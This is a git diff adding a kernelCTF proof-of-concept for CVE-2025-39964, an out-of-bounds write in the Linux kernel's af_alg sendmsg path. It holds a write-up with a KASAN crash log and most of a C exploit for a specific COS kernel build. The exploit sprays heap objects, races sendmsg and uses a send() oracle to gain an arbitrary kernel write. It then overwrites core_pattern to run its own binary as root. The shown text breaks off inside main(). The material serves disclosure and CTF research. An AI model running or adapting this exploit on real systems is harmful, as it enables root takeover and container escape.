diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..b55172a50 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md @@ -0,0 +1,336 @@ +# STAR-2025-0046: Linux Kernel af_alg out-of-bounds access + +## Summary +| **Product** | Linux Kernel | +| ----------------------- | ------------------------ | +| **Vendor** | Linux | +| **Severity** | High - Adversaries may exploit software vulnerabilities to elevate its privileges to root. | +| **Affected Versions** | [Linux 2.6.38](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2) - upstream | +| **CVE Identifier** | | +| **CVE Description** | A out-of-bounds vulnerability in the Linux Kernel af_alg can be exploited to achieve local privilege escalation | +| **CWE Classification(s)** | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer | + +## CVSS3.1 Scoring System +**Base Score:** 7.8 (High) +**Vector String:** `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` +| **Metric** | **Value** | +| ---------------------------- | --------- | +| **Attack Vector (AV)** | Local | +| **Attack Complexity (AC)** | Low | +| **Privileges Required (PR)** | Low | +| **User Interaction (UI)** | None | +| **Scope (S)** | Unchanged | +| **Confidentiality \(C)** | High | +| **Integrity (I)** | High | +| **Availability (A)** | High | + + +## Description of the vulnerability + +In `af_alg_sendmsg` function, we can craft context state (`af_alg_ctx`) that have `ctx->merge = 1` and also have last sgl entry that have `sgl->cur = 0`. From that condition we can trigger out-of-bounds in `af_alg_sendmsg` via this code: +```c + /* use the existing memory in an allocated page */ + if (ctx->merge && !(msg->msg_flags & MSG_SPLICE_PAGES)) { + sgl = list_entry(ctx->tsgl_list.prev, + struct af_alg_tsgl, list); + sg = sgl->sg + sgl->cur - 1; // [1] + len = min_t(size_t, len, + PAGE_SIZE - sg->offset - sg->length); + + err = memcpy_from_msg(page_address(sg_page(sg)) + + sg->offset + sg->length, + msg, len); +``` + +If sgl->cur = 0 in this state, the calculation at [1] will underflow because `sgl->cur - 1` will be -1 and will point to previous heap chunk, with this codition we can craft such page address at previous chunk and achieve kernel arbitrary write via `memcpy_from_msg`. + +This is how we made that such condition happens: + +Let say we have situation where: +1. last sgl->cur = MAX_SGL_ENTS-1 +2. ctx->merge = 0 + +In this code: +```C + + if (!af_alg_writable(sk)) { + err = af_alg_wait_for_wmem(sk, msg->msg_flags); // [2] + if (err) + goto unlock; + } + + /* allocate a new page */ + len = min_t(unsigned long, len, af_alg_sndbuf(sk)); + + err = af_alg_alloc_tsgl(sk); // [3] + if (err) + goto unlock; + + sgl = list_entry(ctx->tsgl_list.prev, struct af_alg_tsgl, + list); + sg = sgl->sg; + if (sgl->cur) + sg_unmark_end(sg + sgl->cur - 1); +``` + +Let say we have two threads do sendmsg, and will stuck at [2] waiting for send buffer available. + +We release some buffer and one of the threads will release. This thread, will use the sg available in the last sgl because we have `sgl->cur = MAX_SGL_ENTS-1`. Then this thread will enter this code: +```c + do { + struct page *pg; + unsigned int i = sgl->cur; + + plen = min_t(size_t, len, PAGE_SIZE); + + pg = alloc_page(GFP_KERNEL); + pr_info("[DEBUG] plen %zd, ctx->merge: %d\n", plen, ctx->merge); + sg_assign_page(sg + i, pg); + + err = memcpy_from_msg( + page_address(sg_page(sg + i)), + msg, plen); + ... + sgl->cur++; + } while (len && sgl->cur < MAX_SGL_ENTS); + + ctx->merge = plen & (PAGE_SIZE - 1); //[4] +``` +Let say we send `len` below the PAGE_SIZE, so `ctx->merge` will set to 1, then this thread will finish. + +In this state, we still have one more thread that stuck at `af_alg_wait_for_wmem` [2]. We will release some buffer, and make this thread continue. + +Now sgl->cur is MAX_SGL_ENTS, it will alloc another sgl at `af_alg_alloc_tsgl` [3], so we have last sgl that have `sgl->cur = 0`. In this state, we passed invalid user space addr. So code will fail in this line: +```c + err = memcpy_from_msg( + page_address(sg_page(sg + i)), + msg, plen); + if (err) { + __free_page(sg_page(sg + i)); + sg_assign_page(sg + i, NULL); + goto unlock; // [5] + } +``` +This thread will finish, and the state of af_alg_ctx is having `ctx->merge = 1` and the last sgl with `sgl->cur = 0`. Next sendmsg will trigger out of bounds like we mention earlier. + +## Proof-Of-Concept Crash log + +``` +[ 13.816985] ================================================================== +[ 13.822876] BUG: KASAN: slab-out-of-bounds in af_alg_sendmsg+0x1f38/0x2150 +[ 13.826941] Read of size 8 at addr ffff888012f1fff8 by task exploit/146 +[ 13.828699] +[ 13.829129] CPU: 1 UID: 1000 PID: 146 Comm: exploit Not tainted 6.12.43 #3 +[ 13.829156] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.4 +[ 13.829184] Call Trace: +[ 13.829198] +[ 13.829201] dump_stack_lvl+0x64/0x80 +[ 13.829211] print_report+0xc4/0x640 +[ 13.829218] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 +[ 13.829222] ? af_alg_sendmsg+0x1f38/0x2150 +[ 13.829227] kasan_report+0xc6/0x100 +[ 13.829230] ? af_alg_sendmsg+0x1f38/0x2150 +[ 13.829232] af_alg_sendmsg+0x1f38/0x2150 +[ 13.829236] ? tty_update_time+0x2ea/0x440 +[ 13.829239] ? tty_read+0x340/0x540 +[ 13.829241] ? __pfx_af_alg_sendmsg+0x10/0x10 +[ 13.829243] ? __pfx_aa_sk_perm+0x10/0x10 +[ 13.829247] ? fdget+0x58/0x3e0 +[ 13.829271] __sys_sendto+0x3d8/0x460 +[ 13.829276] ? __pfx___sys_sendto+0x10/0x10 +[ 13.829278] ? vfs_read+0x6c3/0xb70 +[ 13.829282] ? __asan_memset+0x23/0x50 +[ 13.829285] ? ksys_read+0xfe/0x1d0 +[ 13.829287] ? __pfx_ksys_read+0x10/0x10 +[ 13.829290] ? up_read+0x18/0xa0 +[ 13.829293] __x64_sys_sendto+0xe0/0x1c0 +[ 13.829295] ? clear_bhb_loop+0x40/0x90 +[ 13.829299] ? clear_bhb_loop+0x40/0x90 +[ 13.829301] ? clear_bhb_loop+0x40/0x90 +[ 13.829304] do_syscall_64+0x58/0x120 +[ 13.829307] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.829310] RIP: 0033:0x423eed +[ 13.829314] Code: 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 7d 11 09 00 00 419 +[ 13.829317] RSP: 002b:00007ffcc1b6a658 EFLAGS: 00000246 ORIG_RAX: 000000000000002c +[ 13.829374] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423eed +[ 13.829376] RDX: 0000000000000800 RSI: 00000000004b5b40 RDI: 0000000000000004 +[ 13.829377] RBP: 00007ffcc1b6a7c0 R08: 0000000000000000 R09: 0000000000000000 +[ 13.829378] R10: 0000000000008000 R11: 0000000000000246 R12: 00007ffcc1b6a8d8 +[ 13.829380] R13: 00007ffcc1b6a8e8 R14: 00000000004af828 R15: 0000000000000001 +[ 13.829382] +[ 13.829383] +[ 13.878763] Allocated by task 144: +[ 13.879617] kasan_save_stack+0x33/0x60 +[ 13.880750] kasan_save_track+0x14/0x30 +[ 13.881689] __kasan_slab_alloc+0x6e/0x70 +[ 13.882691] kmem_cache_alloc_noprof+0x10e/0x2b0 +[ 13.883731] getname_kernel+0x51/0x330 +[ 13.884791] kern_path+0x17/0x50 +[ 13.885467] unix_find_other+0x102/0x6a0 +[ 13.886774] unix_dgram_connect+0x21f/0xc50 +[ 13.887809] __sys_connect+0x103/0x130 +[ 13.888868] __x64_sys_connect+0x72/0xb0 +[ 13.890409] do_syscall_64+0x58/0x120 +[ 13.891238] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.892454] +[ 13.892787] Freed by task 144: +[ 13.893632] kasan_save_stack+0x33/0x60 +[ 13.894562] kasan_save_track+0x14/0x30 +[ 13.895426] kasan_save_free_info+0x3b/0x60 +[ 13.896244] __kasan_slab_free+0x37/0x50 +[ 13.896964] kmem_cache_free+0x183/0x4b0 +[ 13.897873] kern_path+0x39/0x50 +[ 13.898850] unix_find_other+0x102/0x6a0 +[ 13.899886] unix_dgram_connect+0x21f/0xc50 +[ 13.901424] __sys_connect+0x103/0x130 +[ 13.902278] __x64_sys_connect+0x72/0xb0 +[ 13.903163] do_syscall_64+0x58/0x120 +[ 13.903869] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.905231] +[ 13.905709] The buggy address belongs to the object at ffff888012f1e600 +[ 13.905709] which belongs to the cache names_cache of size 4096 +[ 13.908496] The buggy address is located 2552 bytes to the right of +[ 13.908496] allocated 4096-byte region [ffff888012f1e600, ffff888012f1f600) +[ 13.911995] +[ 13.912381] The buggy address belongs to the physical page: +[ 13.913783] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12f18 +[ 13.915745] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 +[ 13.917829] flags: 0x100000000000040(head|node=0|zone=1) +[ 13.919473] page_type: f5(slab) +[ 13.920369] raw: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000 +[ 13.921984] raw: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000 +[ 13.923504] head: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000 +[ 13.925136] head: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000 +[ 13.927011] head: 0100000000000003 ffffea00004bc601 ffffffffffffffff 0000000000000000 +[ 13.928761] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000 +[ 13.930494] page dumped because: kasan: bad access detected +[ 13.931957] +[ 13.932564] Memory state around the buggy address: +[ 13.934043] ffff888012f1fe80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.935662] ffff888012f1ff00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.937680] >ffff888012f1ff80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.939445] ^ +[ 13.941597] ffff888012f20000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +[ 13.943583] ffff888012f20080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +[ 13.945124] ================================================================== +[ 13.947164] Disabling lock debugging due to kernel taint +send4 -1 +``` + +## Exploit Idea + +Since the vulnerability can trigger an integer underflow and cause to reference data from a previous memory chunk, we attempted to spray multiple same-sized chunks using sendmsg(). +This allowed us to control the `page_link` value and achieve arbitrary memory write. By overwriting the `core_pattern`, we successfully escalated privileges and achieved container escape. + +```C +struct scatterlist { + long unsigned int page_link; /* 0 8 */ + unsigned int offset; /* 8 4 */ + unsigned int length; /* 12 4 */ + dma_addr_t dma_address; /* 16 8 */ + unsigned int dma_length; /* 24 4 */ + unsigned int dma_flags; /* 28 4 */ + + /* size: 32, cachelines: 1, members: 6 */ + /* last cacheline: 32 bytes */ +}; + +struct af_alg_tsgl { + struct list_head list; /* 0 16 */ + unsigned int cur; /* 16 4 */ + + /* XXX 4 bytes hole, try to pack */ + + struct scatterlist sg[]; /* 24 0 */ + + /* size: 24, cachelines: 1, members: 3 */ + /* sum members: 20, holes: 1, sum holes: 4 */ + /* last cacheline: 24 bytes */ +}; +``` + +### Controlling the write destination via sg[-1].page_link + +When `sgl->cur = 0`, `sg = sgl->sg + sgl->cur - 1 = sgl->sg[-1]`. +`sgl->sg[0]` is at offset 24 from the start of `af_alg_tsgl` (after the 16-byte `list_head` and 4-byte `cur` + 4-byte padding). +`sg[-1]` is therefore at offset `24 - sizeof(scatterlist) = 24 - 32 = -8` relative to the start of the `af_alg_tsgl` object. + +Each `af_alg_tsgl` is `kmalloc`'d into a 4096-byte slab object. So `sg[-1]` falls 8 bytes before the current `af_alg_tsgl`, which is the **last 8 bytes of the previous 4096-byte heap object** at offset `4096 - 8 = 0xff8`. + +We use `sendmsg()` spray to fill the previous heap slot with a controlled `msg_control` buffer (`payload[]`). +`payload[0xff8]` therefore directly aliases `sg[-1].page_link` — the only field we need to control. +`sg[-1].offset` and `sg[-1].length` come from whatever bytes are at `payload[0xff8+8]` and `payload[0xff8+12]`, but these are fixed (set to `'a'` by our spray) and their values are accounted for in the final offset calculation. + +### The write-destination oracle + +The vulnerable code is: + +```C +err = memcpy_from_msg(page_address(sg_page(sg)) + sg->offset + sg->length, + msg, len); +``` + +`sg_page(sg)` interprets `sg->page_link` as a pointer to a `struct page` in the kernel's vmemmap region. +`page_address(page)` converts that back to a virtual address: + +``` +dest = page_offset_base + (page_link - vmemmap_base) / sizeof(struct_page) * PAGE_SIZE + + sg->offset + sg->length +``` + +With `page_link` near 0, the integer arithmetic wraps around (all 64-bit unsigned): + +``` +pfn = (0 - vmemmap_base) / 64 → very large pfn +dest = page_offset_base + pfn * PAGE_SIZE → wraps back into userspace +``` + +This means the computed `dest` lands inside our pre-mapped userspace region `[0x100000000, 0x500000000000)`. + +`memcpy_from_msg` internally calls `copy_from_user_iter` with `to = dest`: + +```C +static __always_inline +size_t copy_from_user_iter(void __user *iter_from, size_t progress, + size_t len, void *to, void *priv2) +``` + +`__copy_from_user` has two behaviours depending on `to`: +- If `to` is an **unmapped address**, the copy faults and returns an error — `send()` returns `-1`. +- If `to` is a **mapped userspace address**, the copy silently succeeds — `send()` returns `1`. + +This gives us a clean boolean oracle: **`send()` returns 1 if and only if the current `page_link` maps `dest` to a physically-backed page in our mmap region.** + +### Binary search to locate the exact physical page + +We pre-map the entire range `[0x100000000, 0x500000000000)` (≈ 80 TB) with anonymous pages in 2 GB chunks. When `page_link = 0` the initial `dest` lands somewhere inside this region — the oracle returns 1. + +We then narrow down the exact page with an 8-step binary search: + +``` +total range = 0x500000000000 bytes +half[j] = total >> (1 + j) (halves the address range each step) +delta[j] = total >> (7 + j) (= half[j] / 64, the page_link adjustment) +``` + +At each step `j`, we test `guess_addr(oracle - delta[j])`: +- Decreasing `page_link` by `delta[j]` shifts `dest` **down** by `delta[j] * 64 = half[j]` bytes. +- If `send()` returns **1** — the shifted dest is still mapped → `dest` is in the **upper half** of the current range → unmap the lower half, advance `start` to the upper half boundary. +- If `send()` returns **-1** — the shifted dest fell outside the mapped region → `dest` is in the **lower half** → unmap the upper half, keep `start` unchanged. + +After 8 iterations the remaining mapped window is `0x500000000000 >> 9 ≈ 340 MB`. +A `mincore()` scan over this window finds the exact 4 KB page (identified by the `'a'`-filled content our spray wrote into it). + +### Redirecting the write to core_pattern + +Once we have the exact userspace virtual address `leak_offset` of the OOB-written page, we know both the physical page and the current within-page byte offset of the write. The steps to redirect to `core_pattern` are: + +1. **Align within-page offset**: send `adjust_offset = 0x1000 + (core_pattern & 0xfff) - (leak_offset & 0xfff)` dummy bytes so that the next write starts at the same in-page offset as `core_pattern`. + +2. **Adjust page_link to target core_pattern's page**: update `payload[0xff8]` (sg[-1].page_link) by + `Δ = ((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6` + The `>> 6` (or `/ 64`) is actually a simplification of the formula `(addr / 0x1000) * 64`. We divide the address by `0x1000` to find the page index, and then multiply by `64` because each memory page has a `page_struct` that is exactly 64 bytes long. + +3. **Write the payload**: `send(opfd, "|/proc/%P/fd/666 %P", 64, MSG_MORE)` — the kernel copies this string to `core_pattern[]`. + +Once `core_pattern` is overwritten, a forked child process (running since exploit start) detects the change via `/proc/sys/kernel/core_pattern`, then deliberately faults (`*(size_t*)0 = 0`) to trigger a coredump. The kernel invokes `core_pattern` as root, re-executing our binary with the parent's PID as `argv[1]`. The re-exec uses `pidfd_getfd()` to steal the parent's stdio file descriptors and reads `/flag`. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..c991c0035 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilities: + - Kernel configuration: CONFIG_CRYPTO_USER_API + - User namespaces required: No +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2 +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285 +- Affected kernel versions: v2.6.36 - v6.16 +- Affected component: crypto/af_alg +- Cause: Out-of-bound access +- Syscall to disable: +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-39964 +- Description: A Out-of-bound access in the Linux kernel's crypto/af_alg. In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg Issuing two writes to the same af_alg socket is bogus as the data will be interleaved in an unpredictable fashion. Furthermore, concurrent writes may create inconsistencies in the internal socket state. Disallow this by adding a new ctx->write field that indiciates exclusive ownership for writing. diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit new file mode 100755 index 000000000..ad33ffc71 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c new file mode 100644 index 000000000..67d4acb78 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c @@ -0,0 +1,884 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (COS + * 121-18867.199.28) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (COS 121-18867.199.28): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a ~340 MB window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. + * We start just above the 4 GB boundary to avoid the low userspace region. + */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Unmapped address passed as invalid user pointer to trigger the race + * condition: the first 4 MB of virtual address space (0–0xfff000) is always + * unmapped. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in COS 121-18867.199.28. + * core_pattern is at 0xffffffff83fb48c0; _stext is at KERNEL_TEXT_BASE. + */ +#define CORE_PATTERN_COS_OFFSET (0xffffffff83fb48c0UL - KERNEL_TEXT_BASE) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. + */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if (getenv("KTEXT")) + stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext */ + core_pattern = stext + CORE_PATTERN_COS_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = 